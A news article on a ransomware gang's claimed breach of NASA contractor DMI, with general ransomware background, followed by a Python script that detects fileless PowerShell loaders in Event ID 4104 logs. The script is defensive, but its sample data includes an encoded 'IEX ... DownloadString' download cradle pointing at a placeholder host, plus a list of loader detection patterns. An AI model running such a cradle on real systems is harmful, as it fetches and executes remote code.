In a blog post, the attackers claimed to have breached the network of Maryland-based Digital Management Inc. (DMI). The company provides IT and cyber-security services to several Fortune 100 companies and government agencies, including NASA.
The attackers leaked almost 20 archive files belonging to NASA, including HR documents and project plans, through a leak portal operated by the gang. Some of the employee details in the files matched public LinkedIn records.
Hackers threaten to leak stolen NASA data
About 2,853 servers and workstations were reported encrypted during the attack. At this stage, there is no information on whether all of the stolen data belongs to NASA.
The modus operandi of this ransomware gang is similar to that of Maze or REvil: it combines encryption with the threat of publishing the stolen data if the ransom is not paid.
Brenda Ferraro, VP of Third-Party Risk at the third-party risk management firm Prevalent, commented on the role that cryptocurrencies continue to play in the rise of ransomware attacks:
“During ransomware attacks, crypto threat intelligence plays a critical role in providing a lens on the real-time dark and deep web sourced blind spots such as hidden websites, handles, IP addresses and, in some cases, physical locations. Without in-the-moment crypto intelligence, the victimized networks are open to activity such as ransomware as a service, money laundering services, etc. in Blockchain time.”
Consequences of a ransomware attack
If the affected files contain valuable data, encrypting them means losing access to that information. If the data is critical to a business – for example, patient data in a hospital, or payroll details in a finance firm – the loss of access can impact the entire company.
If the affected files are used by the device’s operating system, encrypting them can stop the device from working properly. If the device is critical to a company’s operations – for example, a server, hospital medical equipment, or an industrial control system – the business impact can be significant.
In recent years, there have been multiple cases of ransomware spreading through entire company networks, effectively disrupting or even halting normal business until the infected machines can be cleaned and the data recovered.
Recent attacks by other ransomware gangs
The variety and volume of ransomware deployed by attackers have continued to grow at an alarming rate over the last year or so, with pioneering strains such as CryptoLocker and CryptoWall joined by dozens of new variants. It is difficult to overstate the effect the emergence of ransomware has had on consumers, enterprises, and the security industry itself. Authorities have been warning users about crypto-ransomware for some time and have consistently advised victims not to pay ransoms. Security researchers have published decryption tools for specific ransomware variants, and law enforcement agencies have had some success in taking down ransomware gangs.
Three US-based universities were recently targeted by the NetWalker ransomware, and there are reports of a REvil attack on the Texas-based data center provider CyrusOne.
To sum up: crypto-ransomware is malware that encrypts files stored on a computer or mobile device in order to extort money.
Encryption ‘scrambles’ the contents of a file so that it is unreadable. To restore the file for normal use, the corresponding decryption key is needed to ‘unscramble’ it.
Crypto-ransomware essentially takes the files hostage, demanding a ransom in exchange for the decryption key needed to restore them. Such attacks are increasing daily, and precautions need to be taken.
If you work with important or sensitive data, back up all necessary files regularly and store the backups in a location that is not connected to the computer or network. Backups that remain mounted or reachable over the network are encrypted along with everything else, so only an offline or otherwise isolated copy guarantees that an unaffected version is available if your computer is infected.
DoppelPaymer: ransomware that demands ransoms of hundreds of thousands of US dollars. It is part of the BitPaymer family and is aimed at English-speaking users.
REvil: also known as Sodinokibi or Sodin, a ransomware operation that breaches company networks via spam, exploits, exposed remote desktop services, and compromised managed service providers (MSPs). The gang primarily targets large firms and avoids consumers.
NetWalker: ransomware that has been used in fileless attacks, where the payload is not a compiled binary but a PowerShell script executed directly in memory, so the ransomware binary itself is never written to disk.
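Because a fileless PowerShell payload like the one described above never lands on disk, file-based antivirus has little to scan; the useful evidence is the PowerShell script block itself, recorded by Windows Script Block Logging (Microsoft-Windows-PowerShell/Operational, Event ID 4104) once it is enabled. The following is an added example, not code from the article or from any NetWalker sample: it scores constructed 4104-style log lines against generic indicators of in-memory loaders (encoded commands, base64 decoding, reflective assembly loading, decompression, download cradles), decodes any `-EncodedCommand` blob to inspect the real command, and reports only lines that trip more than one indicator, since a single `FromBase64String` is common in legitimate administration. The indicator list, the `example.invalid` URL and the log format are illustrative assumptions.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Generic indicators of PowerShell payloads that are decoded, decompressed or
# loaded in memory rather than run from a file on disk. These are heuristics
# for illustration, not signatures for any particular ransomware family.
INDICATORS = {
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "invoke_expression": re.compile(r"\b(?:Invoke-Expression|IEX)\b", re.I),
    "reflective_load": re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load", re.I),
    "unmanaged_memory": re.compile(r"\b(?:VirtualAlloc|WriteProcessMemory|CreateThread)\b", re.I),
    "decompress": re.compile(r"\b(?:GZipStream|DeflateStream)\b", re.I),
    "remote_download": re.compile(r"\b(?:DownloadString|DownloadData|Invoke-WebRequest|IWR)\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
}

# -EncodedCommand (and its -e / -enc abbreviations) carries a base64 blob of the
# UTF-16LE script text; the real command is only visible after decoding.
ENCODED_RE = re.compile(r"-(?:e|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)


@dataclass
class Finding:
    line_no: int            # 1-based position in the log
    score: int              # number of distinct indicators hit
    hits: List[str]
    decoded: Optional[str]  # recovered -EncodedCommand payload, if any


def decode_encoded_command(text: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_script_block(line_no: int, text: str) -> Finding:
    decoded = decode_encoded_command(text)
    # Mask the base64 blob so its random-looking characters cannot trigger the
    # word-based indicators; the decoded payload is scanned separately.
    masked = ENCODED_RE.sub("-EncodedCommand <blob>", text)
    hits = ["encoded_command"] if ENCODED_RE.search(text) else []
    for name, rx in INDICATORS.items():
        if rx.search(masked) or (decoded is not None and rx.search(decoded)):
            hits.append(name)
    return Finding(line_no, len(hits), hits, decoded)


def scan_log(lines: List[str], threshold: int = 2) -> List[Finding]:
    """Return the script blocks that hit at least `threshold` indicators.

    One hit alone (e.g. FromBase64String in a config loader) is routine in
    legitimate administration, so it is not reported by default."""
    findings = [scan_script_block(i, t) for i, t in enumerate(lines, start=1)]
    return [f for f in findings if f.score >= threshold]


# Constructed sample: a download cradle encoded the way an attacker would pass it
# to powershell.exe -EncodedCommand. example.invalid is a reserved, non-resolving name.
LAUNCHER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
ENCODED = base64.b64encode(LAUNCHER.encode("utf-16-le")).decode("ascii")

# Constructed log lines in the shape of Event ID 4104 ScriptBlockText entries.
SAMPLE_LOG = [
    "4104 ScriptBlockText: Get-ChildItem C:\\Logs -Filter *.log | Measure-Object",
    "4104 ScriptBlockText: Restart-Service -Name Spooler",
    "4104 ScriptBlockText: powershell.exe -nop -w hidden -enc " + ENCODED,
    "4104 ScriptBlockText: $d=[IO.Compression.GZipStream]::new($ms,[IO.Compression.CompressionMode]::Decompress); [Reflection.Assembly]::Load($bytes); IEX $x",
    "4104 ScriptBlockText: $cfg=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($blob))",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: score {f.score}, hits {f.hits}")
        if f.decoded:
            print(f"  decoded payload: {f.decoded}")
```

On the sample, lines 3 (the encoded launcher, whose decoded payload reveals the `IEX` download cradle) and 4 (decompress, reflective load, `IEX`) are reported; the base64 config loader on line 5 scores one and is suppressed. The threshold is the knob to tune against your own environment's baseline of administrative PowerShell.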